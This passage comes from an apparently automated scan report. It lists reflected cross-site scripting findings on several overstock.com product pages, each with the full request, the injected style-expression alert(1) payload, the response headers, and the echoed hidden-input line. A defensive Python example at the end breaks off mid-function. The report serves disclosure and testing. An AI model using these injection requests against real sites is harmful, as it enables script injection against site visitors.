Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:13 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Le
...[SNIP]...
<input type="hidden" name="4266b"style="x:expression(alert(1))"26c79062f8c" value="1"/>
...[SNIP]...

2.97. http://www.overstock.com/Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff271"style%3d"x%3aexpression(alert(1))"32c240f2498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff271"style="x:expression(alert(1))"32c240f2498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html?ff271"style%3d"x%3aexpression(alert(1))"32c240f2498=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:14 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3521764|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:14 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408294315:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:14 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=8
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109399

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Li
...[SNIP]...
<input type="hidden" name="ff271"style="x:expression(alert(1))"32c240f2498" value="1"/>
...[SNIP]...

2.98. http://www.overstock.com/Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b94c4"style%3d"x%3aexpression(alert(1))"ef952e6335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b94c4"style="x:expression(alert(1))"ef952e6335 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html?b94c4"style%3d"x%3aexpression(alert(1))"ef952e6335=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:39 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408319471:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:39 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5131876|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="b94c4"style="x:expression(alert(1))"ef952e6335" value="1"/>
...[SNIP]...

2.99. http://www.overstock.com/Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f8e7"style%3d"x%3aexpression(alert(1))"b5269568014 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f8e7"style="x:expression(alert(1))"b5269568014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html?9f8e7"style%3d"x%3aexpression(alert(1))"b5269568014=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:42 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408322246:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2576616|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:42 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:42 GMT; Path=/
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="9f8e7"style="x:expression(alert(1))"b5269568014" value="1"/>
...[SNIP]...

2.100. http://www.overstock.com/Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49ec"style%3d"x%3aexpression(alert(1))"8a5595016dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e49ec"style="x:expression(alert(1))"8a5595016dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html?e49ec"style%3d"x%3aexpression(alert(1))"8a5595016dc=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:28 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:28 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:28 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3158547|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:28 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408308063:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111790

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="e49ec"style="x:expression(alert(1))"8a5595016dc" value="1"/>
...[SNIP]...

2.101. http://www.overstock.com/Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea2c2"style%3d"x%3aexpression(alert(1))"84955bdb5b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea2c2"style="x:expression(alert(1))"84955bdb5b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html?ea2c2"style%3d"x%3aexpression(alert(1))"84955bdb5b4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:30 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:30 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4342765|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408310216:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="ea2c2"style="x:expression(alert(1))"84955bdb5b4" value="1"/>
...[SNIP]...

2.102. http://www.overstock.com/Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff07e"style%3d"x%3aexpression(alert(1))"6838bc39a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff07e"style="x:expression(alert(1))"6838bc39a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html?ff07e"style%3d"x%3aexpression(alert(1))"6838bc39a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:21 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3889200|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408301902:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Te
...[SNIP]...
<input type="hidden" name="ff07e"style="x:expression(alert(1))"6838bc39a" value="1"/>
...[SNIP]...

2.103. http://www.overstock.com/Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 134ae"style%3d"x%3aexpression(alert(1))"050d7f052a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 134ae"style="x:expression(alert(1))"050d7f052a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html?134ae"style%3d"x%3aexpression(alert(1))"050d7f052a0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:21 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4714183|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408301591:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>To
...[SNIP]...
<input type="hidden" name="134ae"style="x:expression(alert(1))"050d7f052a0" value="1"/>
...[SNIP]...
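The check behind this class of finding, as an added example (it is not part of the XSS.CX report and not Burp Suite code): the payload is sent as the name of a query parameter, and the response is parsed to see whether the double quote inside the payload closed the name="..." attribute so that style="x:expression(alert(1))" became a separate attribute on the element. The function names are invented; the vulnerable response body reproduces the input line shown above, and the encoded body is a constructed example of what correct attribute encoding would emit.

```python
"""Confirm an attribute-context break from a captured response (added example)."""
from html.parser import HTMLParser
from urllib.parse import quote

# Characters left unencoded when building the request target so that the
# probe matches the Request line in the report: quotes and parentheses are
# sent raw, '=' and ':' are percent-encoded (quote() encodes them by default).
SAFE_CHARS = '"()'
INJECTED_STYLE = "x:expression(alert(1))"


def build_probe_path(base_path, prefix, suffix):
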